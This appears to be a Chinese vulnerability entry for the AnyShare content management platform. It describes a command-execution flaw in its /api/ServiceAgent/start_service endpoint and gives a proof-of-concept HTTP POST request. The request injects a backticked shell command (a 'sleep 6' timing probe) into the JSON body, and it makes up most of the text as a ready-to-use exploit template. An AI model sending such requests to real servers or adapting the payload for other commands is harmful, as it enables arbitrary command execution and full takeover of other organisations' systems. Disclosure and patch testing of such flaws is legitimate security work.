漏洞描述
AnyShare智能内容管理平台是一款软硬件一体化产品,主要面向企业级用户,提供非结构化数据管理方案。爱数Anyshare智能内容管理平台的/api/ServiceAgent/start_service接口存在命令执行漏洞。攻击者可以通过构造特定的请求,在目标服务器上执行任意命令,可能导致服务器被完全控制。
爱数Anyshare智能内容管理平台 /api/ServiceAgent/start_service 命令执行漏洞
PoC代码
POST /api/ServiceAgent/start_service HTTP/1.1
Host:
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh
Connection: keep-alive
Content-Length: 13
Content-Type: text/plain;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36
["`sleep 6`"]